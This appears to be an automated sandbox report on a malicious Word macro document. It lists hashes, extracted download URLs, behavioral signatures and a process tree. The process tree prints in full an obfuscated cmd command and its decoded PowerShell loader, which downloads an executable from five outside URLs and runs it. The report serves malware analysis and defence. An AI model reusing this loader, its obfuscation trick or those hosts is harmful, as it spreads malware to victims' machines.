Analysis
-
max time kernel
130s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2024 11:56
Static task
static1
Behavioral task
behavioral1
Sample
24bb76ad6a9367820337836451600353_JaffaCakes118.doc
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
24bb76ad6a9367820337836451600353_JaffaCakes118.doc
Resource
win10v2004-20240419-en
General
-
Target
24bb76ad6a9367820337836451600353_JaffaCakes118.doc
-
Size
222KB
-
MD5
24bb76ad6a9367820337836451600353
-
SHA1
a70c576c9f1360a7f90fb1ba34f9793803952601
-
SHA256
1f8b157a1ffc5053b9aff97ef49879b777f81f0a5ace7c481eefe9bdceb3cd18
-
SHA512
827da66c5b3789c0a9365bcb1748483352a86b0cd9f8ddce4ab75091c957f59b0244fdf84f6436f946bd37d5a44a0c06d1f3cd28aa4b0c06b623c871fe0fd295
-
SSDEEP
3072:ZtUxagq58ghpPyjL/xSu90OoiLuDKZXfwKeljR1C:ZtUxagqOgvPAxUOmD+XfwLu
Malware Config
Extracted
http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k
http://www.vario-reducer.com/wp-content/bGkoUUavZySGn
http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N
http://mingroups.vn/NYV82LSYWEs_s1
http://www.ontamada.ru/RDUstD0DxgOP
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1884 3540 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 33 1732 powershell.exe 34 1732 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3540 WINWORD.EXE 3540 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1732 powershell.exe 1732 powershell.exe 1732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1732 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3540 WINWORD.EXE 3540 WINWORD.EXE 3540 WINWORD.EXE 3540 WINWORD.EXE 3540 WINWORD.EXE 3540 WINWORD.EXE 3540 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exedescription pid process target process PID 3540 wrote to memory of 1884 3540 WINWORD.EXE cmd.exe PID 3540 wrote to memory of 1884 3540 WINWORD.EXE cmd.exe PID 1884 wrote to memory of 4560 1884 cmd.exe cmd.exe PID 1884 wrote to memory of 4560 1884 cmd.exe cmd.exe PID 4560 wrote to memory of 1864 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 1864 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 3476 4560 cmd.exe cmd.exe PID 4560 wrote to memory of 3476 4560 cmd.exe cmd.exe PID 3476 wrote to memory of 1732 3476 cmd.exe powershell.exe PID 3476 wrote to memory of 1732 3476 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\24bb76ad6a9367820337836451600353_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| %TMP:~-8,-7%%CommonProgramFiles:~19,1%%LOCALAPPDATA:~-10,-9% "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\cmd.exeCmD /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| cmD "3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';"4⤵PID:1864
-
C:\Windows\system32\cmd.execmD4⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82